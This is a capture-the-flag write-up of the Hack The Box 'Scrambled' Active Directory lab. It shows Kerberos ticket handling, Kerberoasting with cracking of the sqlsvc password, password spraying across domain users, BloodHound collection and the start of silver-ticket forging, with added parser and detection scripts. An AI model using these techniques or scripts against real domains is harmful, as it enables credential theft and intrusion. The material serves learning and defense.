└──╼ [★]$ nxc smb 10.129.12.119 -u ksimpson -p ksimpson -k --shares
SMB 10.129.12.119 445 DC1 [*] x64 (name:DC1) (domain:scrm.local) (signing:True) (SMBv1:None) (NTLM:False)
SMB 10.129.12.119 445 DC1 [+] scrm.local\ksimpson:ksimpson
SMB 10.129.12.119 445 DC1 [*] Enumerated shares
SMB 10.129.12.119 445 DC1 Share Permissions Remark
SMB 10.129.12.119 445 DC1 ----- ----------- ------
SMB 10.129.12.119 445 DC1 ADMIN$ Remote Admin
SMB 10.129.12.119 445 DC1 C$ Default share
SMB 10.129.12.119 445 DC1 HR
SMB 10.129.12.119 445 DC1 IPC$ READ Remote IPC
SMB 10.129.12.119 445 DC1 IT
SMB 10.129.12.119 445 DC1 NETLOGON READ Logon server share
SMB 10.129.12.119 445 DC1 Public READ
SMB 10.129.12.119 445 DC1 Sales
SMB 10.129.12.119 445 DC1 SYSVOL READ Logon server share
First, request a TGT for the user, either with kinit or with getTGT.py.
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/scrambled]
└──╼ [★]$ kinit ksimpson@SCRM.LOCAL
Password for ksimpson@SCRM.LOCAL:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/scrambled]
└──╼ [★]$ klist
Ticket cache: FILE:/tmp/krb5cc_1000
Default principal: ksimpson@SCRM.LOCAL
Valid starting Expires Service principal
06/11/26 05:08:28 06/11/26 15:08:28 krbtgt/SCRM.LOCAL@SCRM.LOCAL
renew until 06/12/26 05:08:25
Then point the KRB5CCNAME variable at that ticket cache. As you can see, nxc accepts it, so let's see what we can do with that share.
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/scrambled]
└──╼ [★]$ export KRB5CCNAME=/tmp/krb5cc_1000
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/scrambled]
└──╼ [★]$ nxc smb 10.129.12.119 -u ksimpson -k --use-kcache
SMB 10.129.12.119 445 DC1 [*] x64 (name:DC1) (domain:scrm.local) (signing:True) (SMBv1:None) (NTLM:False)
SMB 10.129.12.119 445 DC1 [+] SCRM.LOCAL\ksimpson from ccache
And we get in. Just note that we can't use the IP to connect with Kerberos, because SPNs are built around hostnames, not IPs: asking for a service ticket for cifs/10.129.12.119@SCRM.LOCAL fails because no such SPN is registered, whereas cifs/dc1.scrm.local@SCRM.LOCAL is.
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/scrambled]
└──╼ [★]$ smbclient.py scrm.local/ksimpson:ksimpson@10.129.12.119 -k -no-pass
Impacket v0.14.0.dev0+20260407.172353.7fc084ad - Copyright Fortra, LLC and its affiliated companies
[-] Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/scrambled]
└──╼ [★]$ smbclient.py scrm.local/ksimpson:ksimpson@dc1.scrm.local -k -no-pass
Impacket v0.14.0.dev0+20260407.172353.7fc084ad - Copyright Fortra, LLC and its affiliated companies
Type help for list of commands
#
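The kinit above only works if libkrb5 knows which KDC serves SCRM.LOCAL. There are no SRV records reachable from the attacking box, so that mapping has to come from /etc/krb5.conf. The script below is added here and is not part of the original writeup; it generates a minimal config from the realm and DC name seen in the nmap output and sets rdns = false so the client builds service principals from the hostname you give it rather than from a reverse lookup, which is the same hostname-vs-IP issue just described. The --install flag, the kdc_resolves helper and the file path are assumptions about the attacking box.

```shell
#!/usr/bin/env bash
# Added example (not part of the original writeup): emit a minimal krb5.conf
# for a lab realm whose KDC is not discoverable via DNS SRV records.
# Realm and KDC names come from the nmap output above; everything else is
# an assumption about the attacking box.

# write_krb5_conf REALM KDC_FQDN  -> prints the config to stdout
write_krb5_conf() {
    local realm="$1" kdc="$2" domain
    domain="$(printf '%s' "$realm" | tr '[:upper:]' '[:lower:]')"
    cat <<EOF
[libdefaults]
    default_realm = ${realm}
    # No SRV records for the lab: the KDC is only known via /etc/hosts
    dns_lookup_kdc = false
    dns_lookup_realm = false
    # rdns = false keeps libkrb5 from reverse-resolving the target and
    # building the service principal from whatever PTR record comes back;
    # the SPN must match cifs/${kdc}, not an IP or a stray PTR name.
    rdns = false
    ticket_lifetime = 24h
    forwardable = true

[realms]
    ${realm} = {
        kdc = ${kdc}
        admin_server = ${kdc}
    }

[domain_realm]
    .${domain} = ${realm}
    ${domain} = ${realm}
EOF
}

# The KDC name must resolve before Kerberos is pointed at it; a typo here
# surfaces later as "Cannot find KDC for realm".
kdc_resolves() {
    getent hosts "$1" >/dev/null 2>&1
}

# Usage (writes the file only when explicitly asked):
#   bash krb5conf.sh --install
if [ "${1:-}" = "--install" ]; then
    kdc_resolves dc1.scrm.local || { echo "dc1.scrm.local does not resolve; fix /etc/hosts first" >&2; exit 1; }
    write_krb5_conf SCRM.LOCAL dc1.scrm.local | sudo tee /etc/krb5.conf >/dev/null
fi
```

After installing it, kinit ksimpson@SCRM.LOCAL finds the KDC through the [realms] entry, and impacket tools honour the same file when given -k.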
And we find a file called Network Security Changes.pdf in the Public share.
# use Public
# ls
drw-rw-rw- 0 Thu Nov 4 15:23:19 2021 .
drw-rw-rw- 0 Thu Nov 4 15:23:19 2021 ..
-rw-rw-rw- 630106 Fri Nov 5 10:45:07 2021 Network Security Changes.pdf
# get Network Security Changes.pdf
#
It is a notice for all employees about changes to the network security measures.

One interesting thing: the attacker got access to the DB and obtained a password for users in HR. Since passwords aren't stored in plain text in the DB, one of those users must have a weak password that could be cracked, so let's try to find which user it is.
SQLSVC Account
First we get a list of domain users using the ksimpson account.
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/scrambled]
└──╼ [★]$ nxc smb 10.129.12.119 -u ksimpson -k --use-kcache --users
SMB 10.129.12.119 445 DC1 [*] x64 (name:DC1) (domain:scrm.local) (signing:True) (SMBv1:None) (NTLM:False)
SMB 10.129.12.119 445 DC1 [+] SCRM.LOCAL\ksimpson from ccache
SMB 10.129.12.119 445 DC1 -Username- -Last PW Set- -BadPW- -Description-
SMB 10.129.12.119 445 DC1 administrator 2021-11-08 00:35:59 0 Built-in account for administering the computer/domain
SMB 10.129.12.119 445 DC1 Guest < never> 0 Built-in account for guest access to the computer/domain
SMB 10.129.12.119 445 DC1 krbtgt 2020-01-26 19:15:47 0 Key Distribution Center Service Account
SMB 10.129.12.119 445 DC1 tstar 2021-11-05 14:55:51 0
SMB 10.129.12.119 445 DC1 asmith 2020-02-08 22:29:01 0
SMB 10.129.12.119 445 DC1 sjenkins 2020-02-08 23:11:26 0
SMB 10.129.12.119 445 DC1 sdonington 2020-02-08 23:11:54 0
SMB 10.129.12.119 445 DC1 backupsvc 2021-10-31 20:49:04 0 Backup system service
SMB 10.129.12.119 445 DC1 jhall 2021-10-31 21:09:23 0
SMB 10.129.12.119 445 DC1 rsmith 2021-10-31 21:09:54 0
SMB 10.129.12.119 445 DC1 ehooker 2021-11-03 19:02:41 0
SMB 10.129.12.119 445 DC1 khicks 2021-11-01 15:36:08 0
SMB 10.129.12.119 445 DC1 sqlsvc 2021-11-03 16:32:02 0 SQL server
SMB 10.129.12.119 445 DC1 miscsvc 2021-11-03 18:07:47 0 Miscellaneous scheduled tasks and services
SMB 10.129.12.119 445 DC1 ksimpson 2021-11-04 00:30:57 1
SMB 10.129.12.119 445 DC1 [*] Enumerated 15 local users: SCRM
Using this list with kerbrute for AS-REP roasting didn't return anything, so I moved on to Kerberoasting instead. The sqlsvc user turns out to have an SPN, so we get a TGS hash for it.
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/scrambled]
└──╼ [★]$ GetUserSPNs.py -outputfile kerberoastables.txt -dc-ip 10.129.12.119 'scrm.local/ksimpson:ksimpson' -k -dc-host dc1.scrm.local
Impacket v0.14.0.dev0+20260407.172353.7fc084ad - Copyright Fortra, LLC and its affiliated companies
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
---------------------------- ------ -------- -------------------------- -------------------------- ----------
MSSQLSvc/dc1.scrm.local:1433 sqlsvc 2021-11-03 09:32:02.351452 2026-06-11 04:18:54.095188
MSSQLSvc/dc1.scrm.local sqlsvc 2021-11-03 09:32:02.351452 2026-06-11 04:18:54.095188
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/scrambled]
└──╼ [★]$ cat kerberoastables.txt
$krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$2e54b15a86bcb75aaeb975de8b01eeaf$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
As you can see, hashcat cracks it (auto-detected as mode 13100, a TGS-REP with etype 23) and we get the password.
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/scrambled]
└──╼ [★]$ hashcat -a 0 kerberoastables.txt /usr/share/wordlists/rockyou.txt
hashcat (v7.1.2-382-g2d71af371) starting in autodetect mode
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================================================================================================
* Device #01: cpu-haswell-Intel(R) Core(TM) i7-6700HQ CPU @ 2.60GHz, 1453/2907 MB (512 MB allocatable), 2MCU
Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:
13100 | Kerberos 5, etype 23, TGS-REP | Network Protocol
NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Minimum salt length supported by kernel: 0
Maximum salt length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory allocated for this attack: 512 MB (1950 MB free)
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
Cracking performance lower than expected?
* Append -O to the commandline.
This lowers the maximum supported password/salt length (usually down to 32).
* Append -w 3 to the commandline.
This can cause your screen to lag.
* Append -S to the commandline.
This has a drastic speed impact but can be better for specific attacks.
Typical scenarios are a small wordlist but a large ruleset.
* Update your backend API runtime / driver the right way:
https://hashcat.net/faq/wrongdriver
* Create more work items to make use of your parallelization power:
https://hashcat.net/faq/morework
$krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$2e54b15a86bcb75aaeb975de8b01eeaf$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:Pegasus60
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$2...92bd6d
Time.Started.....: Thu Jun 11 05:38:55 2026 (15 secs)
Time.Estimated...: Thu Jun 11 05:39:10 2026 (0 secs)
Kernel.Feature...: Pure Kernel (password length 0-256 bytes)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........: 742.7 kH/s (2.02ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10729472/14344385 (74.80%)
Rejected.........: 0/10729472 (0.00%)
Restore.Point....: 10727424/14344385 (74.78%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#01...: Petey55 -> Pearson1
Hardware.Mon.#01.: Util: 90%
Started: Thu Jun 11 05:38:49 2026
Stopped: Thu Jun 11 05:39:11 2026
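Hashcat's auto-detect keyed on the second field of the hash, the Kerberos encryption type. That field decides how much cracking effort a Kerberoast hash costs: etype 23 (RC4-HMAC, what GetUserSPNs.py requests) is fast, while etype 17/18 (AES) are far slower. The parser below is an added example and not part of the original writeup; it pulls the etype out of impacket's $krb5tgs$ lines and groups them by hashcat mode. The sample hashes are constructed (the real checksum from above with dummy ciphertext, plus a hypothetical AES hash for a made-up websvc account).

```python
"""
Added example, not part of the original writeup: parse the $krb5tgs$ lines that
GetUserSPNs.py writes and decide how to crack them. The encryption type in the
second field is what hashcat's auto-detect keyed on above (23 -> mode 13100).
The sample hashes below are constructed with dummy hex data; they are not the
real sqlsvc hash, and websvc is a hypothetical account.
"""
import re
from collections import defaultdict

# hashcat modes for Kerberos 5 TGS-REP, keyed by Kerberos etype
HASHCAT_TGS_MODES = {
    23: 13100,  # RC4-HMAC (arcfour-hmac-md5): the fast one to crack
    17: 19600,  # AES128-CTS-HMAC-SHA1-96
    18: 19700,  # AES256-CTS-HMAC-SHA1-96
}

# Impacket writes the two layouts slightly differently:
#   etype 23:    $krb5tgs$23$*user$REALM$target*$checksum$edata
#   etype 17/18: $krb5tgs$18$user$REALM$*target*$checksum$edata
# Recent impacket puts domain/user in the "target" slot rather than the SPN,
# which is why the hash above shows scrm.local/sqlsvc there.
_RC4_RE = re.compile(
    r"^\$krb5tgs\$(?P<etype>23)\$\*(?P<user>[^$]+)\$(?P<realm>[^$]+)\$(?P<target>[^*]+)\*"
    r"\$(?P<checksum>[0-9a-fA-F]+)\$(?P<edata>[0-9a-fA-F]+)$"
)
_AES_RE = re.compile(
    r"^\$krb5tgs\$(?P<etype>17|18)\$(?P<user>[^$]+)\$(?P<realm>[^$]+)\$\*(?P<target>[^*]+)\*"
    r"\$(?P<checksum>[0-9a-fA-F]+)\$(?P<edata>[0-9a-fA-F]+)$"
)


def parse_krb5tgs(line):
    """Return a dict describing one kerberoast hash line, or None if it does not parse."""
    line = line.strip()
    m = _RC4_RE.match(line) or _AES_RE.match(line)
    if not m:
        return None
    etype = int(m.group("etype"))
    # RC4 carries a 16-byte HMAC-MD5 checksum, AES a 12-byte truncated HMAC-SHA1
    expected_checksum_hex = 32 if etype == 23 else 24
    return {
        "user": m.group("user"),
        "realm": m.group("realm"),
        "target": m.group("target"),
        "etype": etype,
        "hashcat_mode": HASHCAT_TGS_MODES[etype],
        "checksum_ok": len(m.group("checksum")) == expected_checksum_hex,
    }


def plan_cracking(lines):
    """Group parsable hashes by hashcat mode: one hashcat run per mode, RC4 first."""
    by_mode = defaultdict(list)
    for line in lines:
        rec = parse_krb5tgs(line)
        if rec and rec["checksum_ok"]:
            by_mode[rec["hashcat_mode"]].append(rec["user"])
    # sorted by mode number puts 13100 (RC4) ahead of the slow AES modes
    return dict(sorted(by_mode.items()))


# Constructed samples: real checksum from the writeup above, dummy ciphertext
SAMPLE_RC4 = (
    "$krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$"
    "2e54b15a86bcb75aaeb975de8b01eeaf$" + "ab" * 40
)
# Hypothetical AES256 hash for a made-up websvc account
SAMPLE_AES256 = (
    "$krb5tgs$18$websvc$SCRM.LOCAL$*scrm.local/websvc*$"
    + "cd" * 12 + "$" + "ef" * 40
)

if __name__ == "__main__":
    for mode, users in plan_cracking([SAMPLE_RC4, SAMPLE_AES256]).items():
        print(f"hashcat -m {mode} <hashfile> rockyou.txt   # {', '.join(users)}")
```

Feed it a whole output file from GetUserSPNs.py and run one hashcat invocation per mode, RC4 first. From the defensive side, the same field is what a SOC watches for: a 4769 event with ticket encryption type 0x17 (RC4) requested for a service account on an AES-capable domain is the classic Kerberoast signature.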
The password is valid for SMB over Kerberos, but the MSSQL login fails. One thing to notice is that nxc mssql was pointed at the IP, so there is no SPN to request a service ticket for, and with NTLM disabled there is no fallback; on top of that, the PDF said SQL access was removed for everyone except network administrators. We'll come back to MSSQL. For now, let's see whether the account has access to any of the SMB shares.
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/scrambled]
└──╼ [★]$ nxc smb 10.129.12.119 -u sqlsvc -p Pegasus60 -k
SMB 10.129.12.119 445 DC1 [*] x64 (name:DC1) (domain:scrm.local) (signing:True) (SMBv1:None) (NTLM:False)
SMB 10.129.12.119 445 DC1 [+] scrm.local\sqlsvc:Pegasus60
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/scrambled]
└──╼ [★]$ nxc mssql 10.129.12.119 -u sqlsvc -p Pegasus60 -k
MSSQL 10.129.12.119 1433 None [*] None (name:10.129.12.119) (domain:) (EncryptionReq:False) (NTLM:False)
MSSQL 10.129.12.119 1433 None [-] None\sqlsvc:Pegasus60
Nothing new on the shares side either: the same read access to IPC$, NETLOGON, Public and SYSVOL that ksimpson had.
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/scrambled]
└──╼ [★]$ nxc smb 10.129.12.119 -u sqlsvc -p Pegasus60 -k --shares
SMB 10.129.12.119 445 DC1 [*] x64 (name:DC1) (domain:scrm.local) (signing:True) (SMBv1:None) (NTLM:False)
SMB 10.129.12.119 445 DC1 [+] scrm.local\sqlsvc:Pegasus60
SMB 10.129.12.119 445 DC1 [*] Enumerated shares
SMB 10.129.12.119 445 DC1 Share Permissions Remark
SMB 10.129.12.119 445 DC1 ----- ----------- ------
SMB 10.129.12.119 445 DC1 ADMIN$ Remote Admin
SMB 10.129.12.119 445 DC1 C$ Default share
SMB 10.129.12.119 445 DC1 HR
SMB 10.129.12.119 445 DC1 IPC$ READ Remote IPC
SMB 10.129.12.119 445 DC1 IT
SMB 10.129.12.119 445 DC1 NETLOGON READ Logon server share
SMB 10.129.12.119 445 DC1 Public READ
SMB 10.129.12.119 445 DC1 Sales
SMB 10.129.12.119 445 DC1 SYSVOL READ Logon server share
The last thing I need to try is spraying this password against all users; usually a specific admin set up the sqlsvc account, and maybe he reused the password. Remember this quote from the file:
so we have removed all access to the SQL service for everyone apart from network administrators.
So maybe they removed access for the sqlsvc account, but the network admin who set it up uses the same password.
And we don't get any hits for that:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/scrambled]
└──╼ [★]$ nxc smb 10.129.12.119 -u users.txt -p Pegasus60 -k --continue-on-success
SMB 10.129.12.119 445 DC1 [*] x64 (name:DC1) (domain:scrm.local) (signing:True) (SMBv1:None) (NTLM:False)
SMB 10.129.12.119 445 DC1 [-] scrm.local\administrator:Pegasus60 KDC_ERR_PREAUTH_FAILED
SMB 10.129.12.119 445 DC1 [-] scrm.local\Guest:Pegasus60 KDC_ERR_CLIENT_REVOKED
SMB 10.129.12.119 445 DC1 [-] scrm.local\krbtgt:Pegasus60 KDC_ERR_CLIENT_REVOKED
SMB 10.129.12.119 445 DC1 [-] scrm.local\tstar:Pegasus60 KDC_ERR_PREAUTH_FAILED
SMB 10.129.12.119 445 DC1 [-] scrm.local\asmith:Pegasus60 KDC_ERR_PREAUTH_FAILED
SMB 10.129.12.119 445 DC1 [-] scrm.local\sjenkins:Pegasus60 KDC_ERR_PREAUTH_FAILED
SMB 10.129.12.119 445 DC1 [-] scrm.local\sdonington:Pegasus60 KDC_ERR_PREAUTH_FAILED
SMB 10.129.12.119 445 DC1 [-] scrm.local\backupsvc:Pegasus60 KDC_ERR_PREAUTH_FAILED
SMB 10.129.12.119 445 DC1 [-] scrm.local\jhall:Pegasus60 KDC_ERR_PREAUTH_FAILED
SMB 10.129.12.119 445 DC1 [-] scrm.local\rsmith:Pegasus60 KDC_ERR_CLIENT_REVOKED
SMB 10.129.12.119 445 DC1 [-] scrm.local\ehooker:Pegasus60 KDC_ERR_PREAUTH_FAILED
SMB 10.129.12.119 445 DC1 [-] scrm.local\khicks:Pegasus60 KDC_ERR_PREAUTH_FAILED
SMB 10.129.12.119 445 DC1 [+] scrm.local\sqlsvc:Pegasus60
SMB 10.129.12.119 445 DC1 [-] scrm.local\miscsvc:Pegasus60 KDC_ERR_PREAUTH_FAILED
SMB 10.129.12.119 445 DC1 [-] scrm.local\ksimpson:Pegasus60 KDC_ERR_PREAUTH_FAILED
This user is valid for LDAP as well, so let's get BloodHound data collected.
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/scrambled]
└──╼ [★]$ nxc ldap 10.129.12.119 -u sqlsvc -p Pegasus60 -k
LDAP 10.129.12.119 389 DC1 [*] None (name:DC1) (domain:scrm.local) (signing:None) (channel binding:Never) (NTLM:False)
LDAP 10.129.12.119 389 DC1 [+] scrm.local\sqlsvc:Pegasus60
So, first get a ticket for that user and use it with RustHound to collect the data:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/scrambled]
└──╼ [★]$ kinit sqlsvc@SCRM.LOCAL
Password for sqlsvc@SCRM.LOCAL:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/scrambled]
└──╼ [★]$ klist
Ticket cache: FILE:/tmp/krb5cc_1000
Default principal: sqlsvc@SCRM.LOCAL
Valid starting Expires Service principal
06/11/26 05:48:36 06/11/26 15:48:36 krbtgt/SCRM.LOCAL@SCRM.LOCAL
renew until 06/12/26 05:48:33
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/scrambled]
└──╼ [★]$ export KRB5CCNAME=/tmp/krb5cc_1000
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/scrambled]
└──╼ [★]$ rusthound -d scrm.local -i 10.129.12.119 -u sqlsvc -p Pegasus60 -z -f dc1.scrm.local -k
---------------------------------------------------
Initializing RustHound at 05:49:04 on 06/11/26
Powered by g0h4n from OpenCyber
---------------------------------------------------
[2026-06-11T12:49:04Z INFO rusthound] Verbosity level: Info
[2026-06-11T12:49:05Z INFO rusthound::ldap] Connected to SCRM.LOCAL Active Directory!
[2026-06-11T12:49:05Z INFO rusthound::ldap] Starting data collection...
[2026-06-11T12:49:08Z INFO rusthound::ldap] All data collected for NamingContext DC=scrm,DC=local
[2026-06-11T12:49:08Z INFO rusthound::json::parser] Starting the LDAP objects parsing...
[2026-06-11T12:49:08Z INFO rusthound::json::parser] Parsing LDAP objects finished!
[2026-06-11T12:49:08Z INFO rusthound::json::checker] Starting checker to replace some values...
[2026-06-11T12:49:08Z INFO rusthound::json::checker] Checking and replacing some values finished!
[2026-06-11T12:49:08Z INFO rusthound::json::maker] 16 users parsed!
[2026-06-11T12:49:08Z INFO rusthound::json::maker] 70 groups parsed!
[2026-06-11T12:49:08Z INFO rusthound::json::maker] 2 computers parsed!
[2026-06-11T12:49:08Z INFO rusthound::json::maker] 6 ous parsed!
[2026-06-11T12:49:08Z INFO rusthound::json::maker] 1 domains parsed!
[2026-06-11T12:49:08Z INFO rusthound::json::maker] 6 gpos parsed!
[2026-06-11T12:49:08Z INFO rusthound::json::maker] 21 containers parsed!
[2026-06-11T12:49:08Z INFO rusthound::json::maker] .//20260611054908_scrm-local_rusthound.zip created!
RustHound Enumeration Completed at 05:49:08 on 06/11/26! Happy Graphing!
Looking at the data I found something very interesting: LDAP shows that we still have execute privilege over the MSSQL server as SQL admin, yet we can't access it. Why? Looking at the groups, I found myself in a group called NOACCESS, which is a way IT uses to enforce a GPO quickly on a bunch of users. So if we have write access over our own account, we could remove ourselves from this group and then use MSSQL normally.
Let's list what we can write as the user sqlsvc:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/scrambled]
└──╼ [★]$ bloodyAD -k --host dc1.scrm.local --domain scrm.local -i 10.129.12.119 -u sqlsvc -p Pegasus60 get writable --detail
distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=scrm,DC=local
url: WRITE
wWWHomePage: WRITE
distinguishedName: CN=SqlSvc,OU=Service Accounts,DC=scrm,DC=local
thumbnailPhoto: WRITE
pager: WRITE
mobile: WRITE
homePhone: WRITE
userSMIMECertificate: WRITE
msDS-ExternalDirectoryObjectId: WRITE
msDS-cloudExtensionAttribute20: WRITE
msDS-cloudExtensionAttribute19: WRITE
msDS-cloudExtensionAttribute18: WRITE
msDS-cloudExtensionAttribute17: WRITE
msDS-cloudExtensionAttribute16: WRITE
msDS-cloudExtensionAttribute15: WRITE
msDS-cloudExtensionAttribute14: WRITE
msDS-cloudExtensionAttribute13: WRITE
msDS-cloudExtensionAttribute12: WRITE
msDS-cloudExtensionAttribute11: WRITE
msDS-cloudExtensionAttribute10: WRITE
msDS-cloudExtensionAttribute9: WRITE
msDS-cloudExtensionAttribute8: WRITE
msDS-cloudExtensionAttribute7: WRITE
msDS-cloudExtensionAttribute6: WRITE
msDS-cloudExtensionAttribute5: WRITE
msDS-cloudExtensionAttribute4: WRITE
msDS-cloudExtensionAttribute3: WRITE
msDS-cloudExtensionAttribute2: WRITE
msDS-cloudExtensionAttribute1: WRITE
msDS-GeoCoordinatesLongitude: WRITE
msDS-GeoCoordinatesLatitude: WRITE
msDS-GeoCoordinatesAltitude: WRITE
msDS-AllowedToActOnBehalfOfOtherIdentity: WRITE
msPKI-CredentialRoamingTokens: WRITE
msDS-FailedInteractiveLogonCountAtLastSuccessfulLogon: WRITE
msDS-FailedInteractiveLogonCount: WRITE
msDS-LastFailedInteractiveLogonTime: WRITE
msDS-LastSuccessfulInteractiveLogonTime: WRITE
msDS-SupportedEncryptionTypes: WRITE
msPKIAccountCredentials: WRITE
msPKIDPAPIMasterKeys: WRITE
msPKIRoamingTimeStamp: WRITE
mSMQDigests: WRITE
mSMQSignCertificates: WRITE
userSharedFolderOther: WRITE
userSharedFolder: WRITE
url: WRITE
otherIpPhone: WRITE
ipPhone: WRITE
assistant: WRITE
primaryInternationalISDNNumber: WRITE
primaryTelexNumber: WRITE
otherMobile: WRITE
otherFacsimileTelephoneNumber: WRITE
userCert: WRITE
homePostalAddress: WRITE
personalTitle: WRITE
wWWHomePage: WRITE
otherHomePhone: WRITE
streetAddress: WRITE
otherPager: WRITE
info: WRITE
otherTelephone: WRITE
userCertificate: WRITE
preferredDeliveryMethod: WRITE
registeredAddress: WRITE
internationalISDNNumber: WRITE
x121Address: WRITE
facsimileTelephoneNumber: WRITE
teletexTerminalIdentifier: WRITE
telexNumber: WRITE
telephoneNumber: WRITE
physicalDeliveryOfficeName: WRITE
postOfficeBox: WRITE
postalCode: WRITE
postalAddress: WRITE
street: WRITE
st: WRITE
l: WRITE
c: WRITE
distinguishedName: DC=scrm.local,CN=MicrosoftDNS,DC=DomainDnsZones,DC=scrm,DC=local
dnsNode: CREATE_CHILD
dnsZoneScopeContainer: CREATE_CHILD
distinguishedName: DC=_msdcs.scrm.local,CN=MicrosoftDNS,DC=ForestDnsZones,DC=scrm,DC=local
dnsNode: CREATE_CHILD
dnsZoneScopeContainer: CREATE_CHILD
As you can see, we can't do that (only informational attributes of our own account are writable, not the group membership), so let's move on to the next attempt.
Ticket Forging
To understand this next attack you'll need some context on how Kerberos works. I have multiple blogs about this, like Kerberoasting and ASREP-Roasting, but let's wrap it up here. In the normal Kerberos flow:
- Client asks KDC for a TGS (service ticket)
- KDC encrypts the TGS with the service account's password hash
- Client presents TGS to the service
But now we have the service account's password (the sqlsvc account), and we can convert it to an NTLM hash easily.
The issue is that the service itself validates the ticket, not the KDC: the service just decrypts the TGS with its own password hash and trusts whatever is inside. So we can forge a ticket ourselves, putting any username inside, and the KDC is never involved; when we connect with the forged ticket, MSSQL decrypts it with its hash and trusts it directly.
Just so you know, this is a Kerberos weakness, not an MSSQL weakness: any other service in this position would be vulnerable to the exact same attack. So let's try and do it.
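Because the KDC is never involved, a forged service ticket leaves a characteristic gap in the logs: the host sees a Kerberos network logon (event 4624) for an account to which no domain controller ever issued a service ticket (event 4769) for that service. The following is an added example, my own code rather than anything from the original post or from the box, that correlates the two over constructed sample events. The event field names are a simplified subset I chose for the example, not the exact Windows event XML names.

```python
from datetime import datetime, timedelta

# Constructed sample events, NOT logs from the box. 4769 (Kerberos service
# ticket requested) is logged on the DC that issued the TGS; 4624 (logon) is
# logged on the host that accepted the ticket. Only the fields the check
# needs are kept.
SAMPLE_EVENTS = [
    {"time": "2026-06-11T05:50:00", "host": "DC1", "id": 4769,
     "account": "sqlsvc", "service": "sqlsvc"},
    {"time": "2026-06-11T05:50:04", "host": "DC1", "id": 4624,
     "account": "sqlsvc", "package": "Kerberos", "logon_type": 3},
    # A Kerberos logon to the service as Administrator, but the KDC never
    # issued Administrator a ticket for this service: the silver-ticket shape.
    {"time": "2026-06-11T06:12:30", "host": "DC1", "id": 4624,
     "account": "Administrator", "package": "Kerberos", "logon_type": 3},
]


def _ts(value):
    return datetime.fromisoformat(value)


def find_unissued_service_logons(events, service_account,
                                 max_age=timedelta(hours=10)):
    """Return Kerberos network logons whose account has no 4769 for
    `service_account` within `max_age` before the logon.

    max_age defaults to the default service ticket lifetime: a client may
    legitimately reuse a cached TGS that long, so a shorter window
    produces false positives.
    """
    tgs_requests = [e for e in events
                    if e["id"] == 4769 and e["service"] == service_account]
    suspicious = []
    for logon in events:
        if (logon["id"] != 4624 or logon.get("package") != "Kerberos"
                or logon.get("logon_type") != 3):
            continue
        when = _ts(logon["time"])
        issued = any(
            req["account"] == logon["account"]
            and when - max_age <= _ts(req["time"]) <= when
            for req in tgs_requests
        )
        if not issued:
            suspicious.append(logon)
    return suspicious


if __name__ == "__main__":
    for hit in find_unissued_service_logons(SAMPLE_EVENTS, "sqlsvc"):
        print(f"{hit['time']} {hit['host']}: Kerberos logon for "
              f"{hit['account']} with no TGS issued by the KDC for sqlsvc")
```

Run as-is, it reports the Administrator logon and not the sqlsvc one. A gap like this is a lead, not proof: the check needs "Audit Kerberos Service Ticket Operations" enabled on every DC, and the 4769 may sit on a different DC than the one you happen to be searching, so collect from all of them before concluding that a ticket was never issued.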
For this to work we'll need:
- the SPN for the service account
- the Service password's hash
